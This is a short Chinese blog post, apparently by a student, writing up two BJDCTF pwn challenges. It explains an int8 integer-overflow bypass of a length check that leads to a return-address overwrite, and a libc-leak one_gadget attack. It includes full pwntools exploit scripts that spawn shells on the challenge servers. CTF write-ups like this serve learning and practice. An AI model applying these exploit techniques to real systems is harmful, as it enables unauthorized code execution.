bjdctf r2t3 onegadget
没错,这就是一篇很水的随笔。...
两道很简单的题,先来看第一道。r2t3,保护检查了一下是只开启了堆栈不可执行。
简单看一下ida的伪代码。
main函数让你输入一个name,然后会执行一个name_check的函数,可以看到v3是int8类型的。这里可以进行整数溢出。
Int8, 等于Byte, 占1个字节.
Int16, 等于short, 占2个字节. -32768 32767
Int32, 等于int, 占4个字节. -2147483648 2147483647
Int64, 等于long, 占8个字节. -9223372036854775808 9223372036854775807
这样, 看起来比short,int,long更加直观些!
另外, 还有一个Byte, 它等于byte, 0 - 255.
所以说这里的v3是占一个字节的,一个字节是由8位二进制决定的。
例如:0000 0000 就是一个字节,代表0,1111 1111 也是一个字节,代表255.
如果1111 1111再加1呢?结果就是0000 0000了,但是这只是显示了一个字节,其实再计算机里面会溢出,前面会进行进位操作,可以看到这里有个判断就是判断v3的长度,必须是在(3,8]这个区间内,满足这个容易,但是就溢出不到返回地址,要想溢出到返回地址,其实输入name的值是肯定要比8大的,这里就用到了这个整数溢出,我们可以给name的值的长度为260,这样就可以既绕过判断长度,又可以溢出到返回地址。
对了,这道题给了后门,所以就直接拿到shell了。这里贴一下exp:
1 from pwn import * 2 3 p = remote('xxxxxx',xxxxx) 4 context.log_level = 'debug' 5 6 shell = 0x0804858B 7 payload = 'a'*21 + p32(shell) 8 payload += 'b'*(255-len(payload)+4) 9 p.sendlineafter('name:',payload) 10 11 print p.recv() 12 p.recv() 13 p.interactive()
接下来就是one_gadget了,这道题,直接给了一个printf的地址,查一下libc版本,然后算出基地址,在直接找一个可以用的one_gadget,就直接拿到shell了。。。
我比赛的时候一直在搭建自己学校的CTF平台,没顾上打这场比赛。。。(主要是自己菜,一道题也做不出来。。。哭唧唧)
就尝试了这一道题,不知道为啥,当时怎么也打不通.............比赛完,再一试,就通了。
无耻的还是贴一下exp:
1 from pwn import * 2 3 context.log_level = 'debug' 4 p = remote('xxxxxxxxn',xxxx) 5 6 p.recvuntil('u:0x') 7 print_addr = int(p.recv(12),16) 8 og = [0xe237f,0xe2383,0xe2386,0x106ef8] 9 base_addr = print_addr - 0x062830 10 shell = base_addr + og[3] 11 payload = str(shell) 12 print payload 13 p.sendlineafter('gadget:',payload) 14 p.interactive()
本来还想发一道题的,结果看见是堆题目,立一个flag,这个星期忙里偷闲,把堆入个门,顺便把拿到yds想要女朋友(???是CTF它不好玩吗?要什么女朋友???)做出来!
下两个博客一个是堆,一个是那道题的解析!好了,又水了一篇博客,真开心,溜了溜了,上数据库原理去了。。。
